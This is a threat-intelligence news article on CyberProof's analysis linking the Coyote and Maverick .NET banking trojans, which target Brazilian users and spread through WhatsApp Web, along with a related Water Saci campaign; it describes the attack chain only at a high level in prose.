Cybersecurity analysts have uncovered close ties between two distinct banking malware families, Coyote and Maverick. According to a report by CyberProof, both malicious programs are developed using .NET, focus on users and financial institutions in Brazil, and share key features. Specifically, they possess identical functionality for decrypting data, targeting banking URLs, and monitoring active banking applications. Crucially, a common and notable feature is their ability to self-propagate through the desktop web version of WhatsApp. This shared infrastructure and targeting strategy has prompted investigation into whether Maverick is a successor or evolution of the older Coyote strain.
The campaign associated with Maverick, which Trend Micro first documented and attributed to the actor “Water Saci,” involves a two-stage attack. The initial component, dubbed SORVEPOTEL, is a self-propagating piece of malware spread via WhatsApp Web, which then delivers a compressed ZIP archive containing the final Maverick payload. Once executed, the malware monitors active browser tabs, constantly checking URLs against a hard-coded list of Latin American financial institutions. If a match is found, it connects to a remote command-and-control (C2) server to download and execute further commands, which are used to gather system data and serve highly convincing phishing pages designed to steal user credentials.
The question of a relationship between the two strains has been a subject of debate among security researchers. Sophos was the first to publicly suggest a possible link, proposing that Maverick might be an evolution of Coyote due to the significant overlaps in targeting and mechanism. While a subsequent analysis by Kaspersky confirmed that Maverick shares numerous code overlaps with Coyote, the firm chose to treat it as an entirely new and distinct threat targeting Brazil on a massive scale. The latest detailed findings from CyberProof further solidify the similarities, adding more evidence to the theory that Maverick is a direct successor or highly modified version of its predecessor.
CyberProof’s technical analysis detailed the initial compromise path: the ZIP archive contains a Windows shortcut (LNK) file that, when activated, triggers a command prompt or PowerShell script. This script connects to an external server to fetch the first-stage payload, which is a powerful PowerShell script designed to launch tools capable of disabling key security features like Microsoft Defender Antivirus and User Account Control (UAC) before retrieving a final .NET loader. This sophisticated loader includes anti-analysis techniques to detect and self-terminate if it finds reverse-engineering tools, ensuring operational security. Only after these checks, and after verifying the victim is geographically located in Brazil (via time zone, language, and regional settings), are the main modules—SORVEPOTEL and Maverick—deployed. CyberProof also noted an expansion of targeting, finding evidence that the malware is being deployed to single out hotels within Brazil.
These findings coincide with a separate report from Trend Micro, detailing a new attack chain employed by Water Saci. This new campaign uses an email-based C2 infrastructure, incorporates multi-vector persistence for increased resilience, and includes advanced checks to restrict execution to systems running in Portuguese, enhancing its stealth. According to the company, this updated attack features a sophisticated remote management system, giving the threat actors real-time control to pause, resume, and monitor the malware campaign, effectively turning compromised machines into a dynamic botnet for coordinated operations across multiple endpoints.
Reference:
